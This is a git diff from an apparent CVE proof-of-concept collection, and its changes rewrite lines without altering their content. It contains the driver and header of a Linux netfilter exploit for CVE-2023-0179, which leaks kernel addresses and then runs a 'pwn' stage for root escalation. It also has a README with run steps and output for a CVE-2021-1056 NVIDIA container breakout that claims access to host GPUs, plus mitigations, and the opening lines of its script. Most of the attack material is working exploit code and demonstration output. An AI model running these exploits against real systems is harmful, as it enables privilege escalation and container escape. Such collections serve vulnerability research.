a/cve/linux-kernel/2023/CVE-2023-0179/helpers.h +++ b/cve/linux-kernel/2023/CVE-2023-0179/helpers.h 
@@ -1,60 +1,60 @@
-/*
- * ----------------------------------------------------------------------------
- * "THE BEER-WARE LICENSE" (Revision 42):
- * David Bouman (pql) wrote this file. As long as you retain this notice you
- * can do whatever you want with this stuff. If we meet some day, and you think
- * this stuff is worth it, you can buy me a beer in return. Signed, David.
- * ----------------------------------------------------------------------------
- */
-
-#pragma once
-#include
-#define MIN(a, b) ((a) < (b) ? (a) : (b))
-#define VLAN_HLEN 4
-#define VLAN_ETH_HLEN 18
-
-enum nft_types {
- NFT_TYPE_TABLE = 0,
- NFT_TYPE_CHAIN,
- NFT_TYPE_RULE,
- NFT_TYPE_SET
-};
-
-enum mode {
- LEAK_ONLY = 1,
- LEAK_AND_PWN
-};
-
-struct unft_base_chain_param {
- uint32_t hook_num;
- uint32_t prio;
-};
-
-// build helpers
-struct nftnl_table* build_table(char* name, uint16_t family);
-struct nftnl_chain* build_chain(char* table_name, char* chain_name, char* dev_name, struct unft_base_chain_param* base_param);
-struct nftnl_rule* build_rule(char* table_name, char* chain_name, uint16_t family, uint64_t* handle);
-struct nftnl_set* build_set(char *table_name, char *set_name, uint16_t family);
-
-// create helpers (actually commits to the kernel)
-int64_t send_batch_request(struct mnl_socket* nl, uint16_t msg, uint16_t msg_flags, uint16_t family, void** object, int* seq, uint64_t (*handler)(struct mnl_socket*, int, int));
-
-int create_table(struct mnl_socket* nl, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int));
-int create_chain(struct mnl_socket* nl, char* chain_name, char* table_name, char* dev_name, uint16_t family, struct unft_base_chain_param* base_param, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int));
-int create_set(struct mnl_socket* nl, char *table_name, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int));
-
-// expression helpers
-void rule_add_bit_shift(
- struct nftnl_rule* r, uint32_t shift_type, uint32_t bitwise_len,
- uint32_t bitwise_sreg, uint32_t bitwise_dreg, void* data, uint32_t data_len);
-void rule_add_memcpy(struct nftnl_rule* r, uint32_t len, uint32_t sreg, uint32_t dreg);
-void rule_add_payload(struct nftnl_rule* r, uint32_t base, uint32_t offset, uint32_t len, uint32_t dreg);
-void rule_add_cmp(struct nftnl_rule* r, uint32_t op, uint32_t sreg, void* data, size_t data_len);
-void add_payload(struct nftnl_rule *r, uint32_t base, uint32_t dreg, uint32_t offset, uint32_t len);
-void rule_add_dynset(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data);
-void rule_add_lookup(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data);
-void rule_add_immediate_data(struct nftnl_rule* r, uint32_t dreg, void* data, size_t data_len);
-void rule_add_immediate_verdict(struct nftnl_rule* r, uint32_t verdict, char* chain_name);
-
-int send_packet();
+/*
+ * ----------------------------------------------------------------------------
+ * "THE BEER-WARE LICENSE" (Revision 42):
+ * David Bouman (pql) wrote this file. As long as you retain this notice you
+ * can do whatever you want with this stuff. If we meet some day, and you think
+ * this stuff is worth it, you can buy me a beer in return. Signed, David.
+ * ----------------------------------------------------------------------------
+ */
+
+#pragma once
+#include
+#define MIN(a, b) ((a) < (b) ? (a) : (b))
+#define VLAN_HLEN 4
+#define VLAN_ETH_HLEN 18
+
+enum nft_types {
+ NFT_TYPE_TABLE = 0,
+ NFT_TYPE_CHAIN,
+ NFT_TYPE_RULE,
+ NFT_TYPE_SET
+};
+
+enum mode {
+ LEAK_ONLY = 1,
+ LEAK_AND_PWN
+};
+
+struct unft_base_chain_param {
+ uint32_t hook_num;
+ uint32_t prio;
+};
+
+// build helpers
+struct nftnl_table* build_table(char* name, uint16_t family);
+struct nftnl_chain* build_chain(char* table_name, char* chain_name, char* dev_name, struct unft_base_chain_param* base_param);
+struct nftnl_rule* build_rule(char* table_name, char* chain_name, uint16_t family, uint64_t* handle);
+struct nftnl_set* build_set(char *table_name, char *set_name, uint16_t family);
+
+// create helpers (actually commits to the kernel)
+int64_t send_batch_request(struct mnl_socket* nl, uint16_t msg, uint16_t msg_flags, uint16_t family, void** object, int* seq, uint64_t (*handler)(struct mnl_socket*, int, int));
+
+int create_table(struct mnl_socket* nl, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int));
+int create_chain(struct mnl_socket* nl, char* chain_name, char* table_name, char* dev_name, uint16_t family, struct unft_base_chain_param* base_param, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int));
+int create_set(struct mnl_socket* nl, char *table_name, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int));
+
+// expression helpers
+void rule_add_bit_shift(
+ struct nftnl_rule* r, uint32_t shift_type, uint32_t bitwise_len,
+ uint32_t bitwise_sreg, uint32_t bitwise_dreg, void* data, uint32_t data_len);
+void rule_add_memcpy(struct nftnl_rule* r, uint32_t len, uint32_t sreg, uint32_t dreg);
+void rule_add_payload(struct nftnl_rule* r, uint32_t base, uint32_t offset, uint32_t len, uint32_t dreg);
+void rule_add_cmp(struct nftnl_rule* r, uint32_t op, uint32_t sreg, void* data, size_t data_len);
+void add_payload(struct nftnl_rule *r, uint32_t base, uint32_t dreg, uint32_t offset, uint32_t len);
+void rule_add_dynset(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data);
+void rule_add_lookup(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data);
+void rule_add_immediate_data(struct nftnl_rule* r, uint32_t dreg, void* data, size_t data_len);
+void rule_add_immediate_verdict(struct nftnl_rule* r, uint32_t verdict, char* chain_name);
+
+int send_packet();
 unsigned long read_from_file(int line);
\ No newline at end of file
diff --git a/cve/linux-kernel/2023/CVE-2023-0179/needle.c b/cve/linux-kernel/2023/CVE-2023-0179/needle.c
index ddf91334..c1e77512 100644
--- a/cve/linux-kernel/2023/CVE-2023-0179/needle.c
+++ b/cve/linux-kernel/2023/CVE-2023-0179/needle.c
@@ -1,141 +1,141 @@
-#define _GNU_SOURCE 1
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-
-#include "helpers.h"
-#include "exploit.h"
-
-int main(int argc, char** argv, char** envp)
-{
- // Use unique thread stack
- cpu_set_t set;
- CPU_ZERO(&set);
- CPU_SET(0, &set);
- sched_setaffinity(getpid(), sizeof(cpu_set_t), &set);
-
- enum mode choice;
-
- // cool trick from https://github.com/pqlx/CVE-2022-1015/blob/master/pwn.c
- if (argc < 2) {
- puts("[+] Dropping into network namespace");
-
- char* new_argv[] = {
- "/usr/bin/unshare",
- "-Urn",
- argv[0],
- "EXPLOIT",
- NULL
- };
-
- execve(new_argv[0], new_argv, envp);
- puts("Couldn't start unshare wrapper..");
- puts("Recompile the exploit with an appropriate unshare path.");
- exit(EXIT_FAILURE);
- }
- if (strcmp("EXPLOIT", argv[1])) {
- puts("[-] Something went wrong...");
- exit(EXIT_FAILURE);
- }
-
- puts("Choose an option:");
- puts(" 1. Leak kernel TEXT address and regs address");
- puts(" 2. Run the exploit");
-
- scanf("%d", (int *) &choice);
-
- char *table_name = "mytable",
- *base_chain_name = "base_chain",
- *exploit_chain_name = "exploit_chain",
- *set_name = "myset12",
- *dev_name = "eth0";
-
- puts("[+] Setting up the network namespace environment");
- system("./setup.sh");
-
- struct mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER);
- if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {
- perror("[-] mnl_socket_bind");
- puts("[-] Check your CAP_NET_ADMIN capability");
- exit(EXIT_FAILURE);
- }
-
- // Wait for local traffic to cool down
- sleep(5);
-
- int seq = time(NULL);
- if (create_table(nl, table_name, NFPROTO_NETDEV, &seq, NULL) == -1) {
- perror("[-] Failed creating table");
- exit(EXIT_FAILURE);
- }
- printf("[+] Created table %s\n", table_name);
-
- struct unft_base_chain_param bp;
- // NF_INET_PRE_ROUTING and NF_BR_LOCAL_IN shoud also work
- bp.hook_num = NF_NETDEV_INGRESS;
- bp.prio = INT_MIN;
- if (create_chain(nl, table_name, base_chain_name, dev_name, NFPROTO_NETDEV, &bp, &seq, NULL)) {
- perror("[-] Failed creating base chain");
- exit(EXIT_FAILURE);
- }
- printf("[+] Created base chain %s\n", base_chain_name);
-
- if (create_chain(nl, table_name, exploit_chain_name, dev_name, NFPROTO_NETDEV, NULL, &seq, NULL)) {
- perror("[-] Failed creating exploit chain");
- exit(EXIT_FAILURE);
- }
- printf("[+] Created exploit chain %s\n", base_chain_name);
-
- if (create_set(nl, table_name, set_name, NFPROTO_NETDEV, &seq, NULL)) {
- perror("[-] Failed creating set");
- exit(EXIT_FAILURE);
- }
- printf("[+] Created exploit set\n");
-
- if (create_base_chain_rule_leak(nl, table_name, base_chain_name, NFPROTO_NETDEV, NULL, &seq)) {
- perror("[-] Failed creating base chain rule");
- exit(EXIT_FAILURE);
- }
- printf("[+] Created base chain rule\n");
-
- uint8_t offset = 19, len = 4, vlan_hlen = 4;
- uint8_t ethlen = len - offset + len - VLAN_ETH_HLEN + vlan_hlen;
- unsigned long found_addr;
- unsigned long found_instr;
- if (create_exploit_chain_rule_leak(nl, table_name, exploit_chain_name, NFPROTO_NETDEV, NULL, &seq, offset, len)) {
- perror("[-] Failed creating base chain rule");
- return EXIT_FAILURE;
- }
- printf("[+] offset: %hhu & len: %hhu & ethlen = %hhu\n", offset, len, ethlen);
- puts("[+] Successfully created exploit chain rule!");
- if (send_packet() == 0) {
- system("nft list map netdev mytable myset12 | ./run.sh > reg.log");
- found_addr = read_from_file(0);
- found_instr = read_from_file(1);
- printf("[+] Found regs address: 0x%lx\n", found_addr);
- printf("[+] Found instr address: 0x%lx\n", found_instr);
- printf("[+] KASLR slide: 0x%lx\n", found_instr - INSTR_BASE);
- system("nft delete table netdev mytable");
- }
-
- if (choice == LEAK_AND_PWN) {
- printf("[+] Inserting the needle into address 0x%lx\n", found_addr);
- sleep(5);
- return pwn(nl, found_addr, found_instr);
- }
- return EXIT_SUCCESS;
-}
+#define _GNU_SOURCE 1
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#include "helpers.h"
+#include "exploit.h"
+
+int main(int argc, char** argv, char** envp)
+{
+ // Use unique thread stack
+ cpu_set_t set;
+ CPU_ZERO(&set);
+ CPU_SET(0, &set);
+ sched_setaffinity(getpid(), sizeof(cpu_set_t), &set);
+
+ enum mode choice;
+
+ // cool trick from https://github.com/pqlx/CVE-2022-1015/blob/master/pwn.c
+ if (argc < 2) {
+ puts("[+] Dropping into network namespace");
+
+ char* new_argv[] = {
+ "/usr/bin/unshare",
+ "-Urn",
+ argv[0],
+ "EXPLOIT",
+ NULL
+ };
+
+ execve(new_argv[0], new_argv, envp);
+ puts("Couldn't start unshare wrapper..");
+ puts("Recompile the exploit with an appropriate unshare path.");
+ exit(EXIT_FAILURE);
+ }
+ if (strcmp("EXPLOIT", argv[1])) {
+ puts("[-] Something went wrong...");
+ exit(EXIT_FAILURE);
+ }
+
+ puts("Choose an option:");
+ puts(" 1. Leak kernel TEXT address and regs address");
+ puts(" 2. Run the exploit");
+
+ scanf("%d", (int *) &choice);
+
+ char *table_name = "mytable",
+ *base_chain_name = "base_chain",
+ *exploit_chain_name = "exploit_chain",
+ *set_name = "myset12",
+ *dev_name = "eth0";
+
+ puts("[+] Setting up the network namespace environment");
+ system("./setup.sh");
+
+ struct mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER);
+ if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {
+ perror("[-] mnl_socket_bind");
+ puts("[-] Check your CAP_NET_ADMIN capability");
+ exit(EXIT_FAILURE);
+ }
+
+ // Wait for local traffic to cool down
+ sleep(5);
+
+ int seq = time(NULL);
+ if (create_table(nl, table_name, NFPROTO_NETDEV, &seq, NULL) == -1) {
+ perror("[-] Failed creating table");
+ exit(EXIT_FAILURE);
+ }
+ printf("[+] Created table %s\n", table_name);
+
+ struct unft_base_chain_param bp;
+ // NF_INET_PRE_ROUTING and NF_BR_LOCAL_IN shoud also work
+ bp.hook_num = NF_NETDEV_INGRESS;
+ bp.prio = INT_MIN;
+ if (create_chain(nl, table_name, base_chain_name, dev_name, NFPROTO_NETDEV, &bp, &seq, NULL)) {
+ perror("[-] Failed creating base chain");
+ exit(EXIT_FAILURE);
+ }
+ printf("[+] Created base chain %s\n", base_chain_name);
+
+ if (create_chain(nl, table_name, exploit_chain_name, dev_name, NFPROTO_NETDEV, NULL, &seq, NULL)) {
+ perror("[-] Failed creating exploit chain");
+ exit(EXIT_FAILURE);
+ }
+ printf("[+] Created exploit chain %s\n", base_chain_name);
+
+ if (create_set(nl, table_name, set_name, NFPROTO_NETDEV, &seq, NULL)) {
+ perror("[-] Failed creating set");
+ exit(EXIT_FAILURE);
+ }
+ printf("[+] Created exploit set\n");
+
+ if (create_base_chain_rule_leak(nl, table_name, base_chain_name, NFPROTO_NETDEV, NULL, &seq)) {
+ perror("[-] Failed creating base chain rule");
+ exit(EXIT_FAILURE);
+ }
+ printf("[+] Created base chain rule\n");
+
+ uint8_t offset = 19, len = 4, vlan_hlen = 4;
+ uint8_t ethlen = len - offset + len - VLAN_ETH_HLEN + vlan_hlen;
+ unsigned long found_addr;
+ unsigned long found_instr;
+ if (create_exploit_chain_rule_leak(nl, table_name, exploit_chain_name, NFPROTO_NETDEV, NULL, &seq, offset, len)) {
+ perror("[-] Failed creating base chain rule");
+ return EXIT_FAILURE;
+ }
+ printf("[+] offset: %hhu & len: %hhu & ethlen = %hhu\n", offset, len, ethlen);
+ puts("[+] Successfully created exploit chain rule!");
+ if (send_packet() == 0) {
+ system("nft list map netdev mytable myset12 | ./run.sh > reg.log");
+ found_addr = read_from_file(0);
+ found_instr = read_from_file(1);
+ printf("[+] Found regs address: 0x%lx\n", found_addr);
+ printf("[+] Found instr address: 0x%lx\n", found_instr);
+ printf("[+] KASLR slide: 0x%lx\n", found_instr - INSTR_BASE);
+ system("nft delete table netdev mytable");
+ }
+
+ if (choice == LEAK_AND_PWN) {
+ printf("[+] Inserting the needle into address 0x%lx\n", found_addr);
+ sleep(5);
+ return pwn(nl, found_addr, found_instr);
+ }
+ return EXIT_SUCCESS;
+}
diff --git a/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml b/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml
index 74ca113b..df173263 100644
--- a/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml
+++ b/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml
@@ -1,23 +1,23 @@
-id: CVE-2023-0179
-source: https://github.com/TurtleARM/CVE-2023-0179-PoC
-info:
- name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
- severity: high
- description: |
- 在 Linux 内核的 Netfilter 子系统中发现一个缓冲区溢出漏洞。此问题可能允许堆栈和堆地址泄漏,并可能允许通过任意代码执行将本地权限提升给根用户。
- scope-of-influence:
- Red Hat Enterprise Linux 9
- reference:
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0179
- - https://www.openwall.com/lists/oss-security/2023/01/13/2
- - https://patchwork.ozlabs.org/project/netfilter-devel/patch/20230111212251.193032-4-pablo@netfilter.org/
- - https://ubuntu.com/security/notices/USN-5856-1
- - https://ubuntu.com/security/notices/USN-5857-1
- - https://ubuntu.com/security/notices/USN-5858-1
- - https://ubuntu.com/security/notices/USN-5859-1
- classification:
- cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 7.8
- cve-id: CVE-2023-0179
- cnvd-id: NONE
+id: CVE-2023-0179
+source: https://github.com/TurtleARM/CVE-2023-0179-PoC
+info:
+ name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+ severity: high
+ description: |
+ 在 Linux 内核的 Netfilter 子系统中发现一个缓冲区溢出漏洞。此问题可能允许堆栈和堆地址泄漏,并可能允许通过任意代码执行将本地权限提升给根用户。
+ scope-of-influence:
+ Red Hat Enterprise Linux 9
+ reference:
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0179
+ - https://www.openwall.com/lists/oss-security/2023/01/13/2
+ - https://patchwork.ozlabs.org/project/netfilter-devel/patch/20230111212251.193032-4-pablo@netfilter.org/
+ - https://ubuntu.com/security/notices/USN-5856-1
+ - https://ubuntu.com/security/notices/USN-5857-1
+ - https://ubuntu.com/security/notices/USN-5858-1
+ - https://ubuntu.com/security/notices/USN-5859-1
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.8
+ cve-id: CVE-2023-0179
+ cnvd-id: NONE
 tags: 缓冲区溢出,cve2023
\ No newline at end of file
diff --git a/cve/nvidia/2021/CVE-2021-1056/README.md b/cve/nvidia/2021/CVE-2021-1056/README.md
index ca9ccc4a..4e50d6c2 100644
--- a/cve/nvidia/2021/CVE-2021-1056/README.md
+++ b/cve/nvidia/2021/CVE-2021-1056/README.md
@@ -1,163 +1,163 @@
-# CVE-2021-1056
-
-NVIDIA GPU Display Driver for Linux, all versions, contains a vulnerability in the kernel mode layer (nvidia.ko) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure.
-
-Here demonstrates the vulnerability on GPU containers created by [nvidia-container-runtime](https://github.com/NVIDIA/nvidia-container-runtime). For a comprehensive understanding, check out the accompanying [official post](https://ubuntu.com/security/CVE-2021-1056) for in-depth details.
-
-## How it works
-
-By creating specific character device files an attacker in a GPU container(container created by `nvidia-container-runtime`) is able to get access to all GPU devices on the host.
-
-It also works on GPU pod created by `k8s-device-plugin` on kubernetes cluster.
-
-
-
-## Prerequisite
-
-* Docker 19.03
-* `nvidia-container-toolkit`
-
-* NVIDIA Driver 418.87.01 / 450.51.05
-* NVIDIA GPU Tesla V100 / TITAN V / Tesla K80
-
-NOTE: refer to [NVIDIA Security Bulletin](https://nvidia.custhelp.com/app/answers/detail/a_id/5142), this vulnerability works on all GeForce, NVIDIA RTX/Quadro, NVS and Tesla series GPU, and all version drivers.
-
-
-
-## Usage
-
-* start a container with only 1 GPU card and mount
-
-```bash
-$ docker run --gpus 1 -v $PWD:/CVE-2021-1056 -it tensorflow/tensorflow:1.13.2-gpu bash
-```
-
-
-
-* check gpu status **in container**
-
-```bash
-# nvidia-smi
-Sat Jan 9 07:21:03 2021
-+-----------------------------------------------------------------------------+
-| NVIDIA-SMI 450.51.05 Driver Version: 450.51.05 CUDA Version: 11.0 |
-|-------------------------------+----------------------+----------------------+
-| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |
-| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |
-| | | MIG M. |
-|===============================+======================+======================|
-| 0 Tesla V100-PCIE... Off | 00000000:02:00.0 Off | 0 |
-| N/A 27C P0 23W / 250W | 0MiB / 32510MiB | 0% Default |
-| | | N/A |
-+-------------------------------+----------------------+----------------------+
-
-+-----------------------------------------------------------------------------+
-| Processes: |
-| GPU GI CI PID Type Process name GPU Memory |
-| ID ID Usage |
-|=============================================================================|
-| No running processes found |
-+-----------------------------------------------------------------------------+
-```
-
-
-
-* execute script **in container**
-
-```bash
-# bash /CVE-2021-1056/main.sh
-[INFO] init GPU num: 1
-[DEBUG] /dev/nvidia0 exists, skip
-[DEBUG] successfully get /dev/nvidia1
-[DEBUG] successfully get /dev/nvidia2
-[DEBUG] successfully get /dev/nvidia3
-[DEBUG] delete redundant /dev/nvidia4
-[INFO] get extra 3 GPU devices from host
-[INFO] current GPU num: 4
-[INFO] exec nvidia-smi:
-Sat Jan 9 07:22:43 2021
-+-----------------------------------------------------------------------------+
-| NVIDIA-SMI 450.51.05 Driver Version: 450.51.05 CUDA Version: 11.0 |
-|-------------------------------+----------------------+----------------------+
-| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |
-| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |
-| | | MIG M. |
-|===============================+======================+======================|
-| 0 Tesla V100-PCIE... Off | 00000000:02:00.0 Off | 0 |
-| N/A 27C P0 23W / 250W | 0MiB / 32510MiB | 0% Default |
-| | | N/A |
-+-------------------------------+----------------------+----------------------+
-| 1 Tesla V100-PCIE... Off | 00000000:03:00.0 Off | 0 |
-| N/A 30C P0 25W / 250W | 0MiB / 32510MiB | 0% Default |
-| | | N/A |
-+-------------------------------+----------------------+----------------------+
-| 2 Tesla V100-PCIE... Off | 00000000:82:00.0 Off | 0 |
-| N/A 29C P0 25W / 250W | 0MiB / 32510MiB | 0% Default |
-| | | N/A |
-+-------------------------------+----------------------+----------------------+
-| 3 Tesla V100-PCIE... Off | 00000000:83:00.0 Off | 0 |
-| N/A 28C P0 25W / 250W | 0MiB / 32510MiB | 0% Default |
-| | | N/A |
-+-------------------------------+----------------------+----------------------+
-
-+-----------------------------------------------------------------------------+
-| Processes: |
-| GPU GI CI PID Type Process name GPU Memory |
-| ID ID Usage |
-|=============================================================================|
-| No running processes found |
-+-----------------------------------------------------------------------------+
-```
-
-
-
-* run a tensorflow demo **in container** to ensure all the GPUs can indeed be accessed
-
-```bash
-# nohup python /CVE-2021-1056/tf_distr_demo.py > log 2>&1 &
-# nvidia-smi
-Sat Jan 9 18:58:23 2021
-+-----------------------------------------------------------------------------+
-| NVIDIA-SMI 450.51.05 Driver Version: 450.51.05 CUDA Version: 11.0 |
-|-------------------------------+----------------------+----------------------+
-| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |
-| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |
-| | | MIG M. |
-|===============================+======================+======================|
-| 0 Tesla V100-PCIE... Off | 00000000:02:00.0 Off | 0 |
-| N/A 32C P0 36W / 250W | 31117MiB / 32510MiB | 1% Default |
-| | | N/A |
-+-------------------------------+----------------------+----------------------+
-| 1 Tesla V100-PCIE... Off | 00000000:03:00.0 Off | 0 |
-| N/A 33C P0 35W / 250W | 31117MiB / 32510MiB | 1% Default |
-| | | N/A |
-+-------------------------------+----------------------+----------------------+
-| 2 Tesla V100-PCIE... Off | 00000000:82:00.0 Off | 0 |
-| N/A 33C P0 36W / 250W | 31117MiB / 32510MiB | 1% Default |
-| | | N/A |
-+-------------------------------+----------------------+----------------------+
-| 3 Tesla V100-PCIE... Off | 00000000:83:00.0 Off | 0 |
-| N/A 32C P0 37W / 250W | 31117MiB / 32510MiB | 1% Default |
-| | | N/A |
-+-------------------------------+----------------------+----------------------+
-
-+-----------------------------------------------------------------------------+
-| Processes: |
-| GPU GI CI PID Type Process name GPU Memory |
-| ID ID Usage |
-|=============================================================================|
-+-----------------------------------------------------------------------------+
-```
-
-
-
-## How to prevent
-
-Recommended
-
-* Refer to the [NVIDIA Security Bulletin](https://nvidia.custhelp.com/app/answers/detail/a_id/5142) or to update the NVIDIA GPU driver
-
-Or
-
-* Add arg `--cap-drop MKNOD` to the `docker run` to forbid the `mknod` in containers
+# CVE-2021-1056
+
+NVIDIA GPU Display Driver for Linux, all versions, contains a vulnerability in the kernel mode layer (nvidia.ko) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure.
+
+Here demonstrates the vulnerability on GPU containers created by [nvidia-container-runtime](https://github.com/NVIDIA/nvidia-container-runtime). For a comprehensive understanding, check out the accompanying [official post](https://ubuntu.com/security/CVE-2021-1056) for in-depth details.
+
+## How it works
+
+By creating specific character device files an attacker in a GPU container(container created by `nvidia-container-runtime`) is able to get access to all GPU devices on the host.
+
+It also works on GPU pod created by `k8s-device-plugin` on kubernetes cluster.
+
+
+
+## Prerequisite
+
+* Docker 19.03
+* `nvidia-container-toolkit`
+
+* NVIDIA Driver 418.87.01 / 450.51.05
+* NVIDIA GPU Tesla V100 / TITAN V / Tesla K80
+
+NOTE: refer to [NVIDIA Security Bulletin](https://nvidia.custhelp.com/app/answers/detail/a_id/5142), this vulnerability works on all GeForce, NVIDIA RTX/Quadro, NVS and Tesla series GPU, and all version drivers.
+
+
+
+## Usage
+
+* start a container with only 1 GPU card and mount
+
+```bash
+$ docker run --gpus 1 -v $PWD:/CVE-2021-1056 -it tensorflow/tensorflow:1.13.2-gpu bash
+```
+
+
+
+* check gpu status **in container**
+
+```bash
+# nvidia-smi
+Sat Jan 9 07:21:03 2021
++-----------------------------------------------------------------------------+
+| NVIDIA-SMI 450.51.05 Driver Version: 450.51.05 CUDA Version: 11.0 |
+|-------------------------------+----------------------+----------------------+
+| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |
+| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |
+| | | MIG M. |
+|===============================+======================+======================|
+| 0 Tesla V100-PCIE... Off | 00000000:02:00.0 Off | 0 |
+| N/A 27C P0 23W / 250W | 0MiB / 32510MiB | 0% Default |
+| | | N/A |
++-------------------------------+----------------------+----------------------+
+
++-----------------------------------------------------------------------------+
+| Processes: |
+| GPU GI CI PID Type Process name GPU Memory |
+| ID ID Usage |
+|=============================================================================|
+| No running processes found |
++-----------------------------------------------------------------------------+
+```
+
+
+
+* execute script **in container**
+
+```bash
+# bash /CVE-2021-1056/main.sh
+[INFO] init GPU num: 1
+[DEBUG] /dev/nvidia0 exists, skip
+[DEBUG] successfully get /dev/nvidia1
+[DEBUG] successfully get /dev/nvidia2
+[DEBUG] successfully get /dev/nvidia3
+[DEBUG] delete redundant /dev/nvidia4
+[INFO] get extra 3 GPU devices from host
+[INFO] current GPU num: 4
+[INFO] exec nvidia-smi:
+Sat Jan 9 07:22:43 2021
++-----------------------------------------------------------------------------+
+| NVIDIA-SMI 450.51.05 Driver Version: 450.51.05 CUDA Version: 11.0 |
+|-------------------------------+----------------------+----------------------+
+| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |
+| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |
+| | | MIG M. |
+|===============================+======================+======================|
+| 0 Tesla V100-PCIE... Off | 00000000:02:00.0 Off | 0 |
+| N/A 27C P0 23W / 250W | 0MiB / 32510MiB | 0% Default |
+| | | N/A |
++-------------------------------+----------------------+----------------------+
+| 1 Tesla V100-PCIE... Off | 00000000:03:00.0 Off | 0 |
+| N/A 30C P0 25W / 250W | 0MiB / 32510MiB | 0% Default |
+| | | N/A |
++-------------------------------+----------------------+----------------------+
+| 2 Tesla V100-PCIE... Off | 00000000:82:00.0 Off | 0 |
+| N/A 29C P0 25W / 250W | 0MiB / 32510MiB | 0% Default |
+| | | N/A |
++-------------------------------+----------------------+----------------------+
+| 3 Tesla V100-PCIE... Off | 00000000:83:00.0 Off | 0 |
+| N/A 28C P0 25W / 250W | 0MiB / 32510MiB | 0% Default |
+| | | N/A |
++-------------------------------+----------------------+----------------------+
+
++-----------------------------------------------------------------------------+
+| Processes: |
+| GPU GI CI PID Type Process name GPU Memory |
+| ID ID Usage |
+|=============================================================================|
+| No running processes found |
++-----------------------------------------------------------------------------+
+```
+
+
+
+* run a tensorflow demo **in container** to ensure all the GPUs can indeed be accessed
+
+```bash
+# nohup python /CVE-2021-1056/tf_distr_demo.py > log 2>&1 &
+# nvidia-smi
+Sat Jan 9 18:58:23 2021
++-----------------------------------------------------------------------------+
+| NVIDIA-SMI 450.51.05 Driver Version: 450.51.05 CUDA Version: 11.0 |
+|-------------------------------+----------------------+----------------------+
+| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |
+| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |
+| | | MIG M. |
+|===============================+======================+======================|
+| 0 Tesla V100-PCIE... Off | 00000000:02:00.0 Off | 0 |
+| N/A 32C P0 36W / 250W | 31117MiB / 32510MiB | 1% Default |
+| | | N/A |
++-------------------------------+----------------------+----------------------+
+| 1 Tesla V100-PCIE... Off | 00000000:03:00.0 Off | 0 |
+| N/A 33C P0 35W / 250W | 31117MiB / 32510MiB | 1% Default |
+| | | N/A |
++-------------------------------+----------------------+----------------------+
+| 2 Tesla V100-PCIE... Off | 00000000:82:00.0 Off | 0 |
+| N/A 33C P0 36W / 250W | 31117MiB / 32510MiB | 1% Default |
+| | | N/A |
++-------------------------------+----------------------+----------------------+
+| 3 Tesla V100-PCIE... Off | 00000000:83:00.0 Off | 0 |
+| N/A 32C P0 37W / 250W | 31117MiB / 32510MiB | 1% Default |
+| | | N/A |
++-------------------------------+----------------------+----------------------+
+
++-----------------------------------------------------------------------------+
+| Processes: |
+| GPU GI CI PID Type Process name GPU Memory |
+| ID ID Usage |
+|=============================================================================|
++-----------------------------------------------------------------------------+
+```
+
+
+
+## How to prevent
+
+Recommended
+
+* Refer to the [NVIDIA Security Bulletin](https://nvidia.custhelp.com/app/answers/detail/a_id/5142) or to update the NVIDIA GPU driver
+
+Or
+
+* Add arg `--cap-drop MKNOD` to the `docker run` to forbid the `mknod` in containers
 * Enable `security context` in kubernetes clusters when creating a pod
\ No newline at end of file
diff --git a/cve/nvidia/2021/CVE-2021-1056/main.sh b/cve/nvidia/2021/CVE-2021-1056/main.sh
index 504871b7..24bb7a24 100644
--- a/cve/nvidia/2021/CVE-2021-1056/main.sh
+++ b/cve/nvidia/2021/CVE-2021-1056/main.sh
@@ -1,42 +1,42 @@
-#!/usr/bin/env bash
-
-ROOT=$(cd $(dirname ${BASH_SOURCE[0]}) && pwd -P)
-source "${ROOT}/util.sh"
-
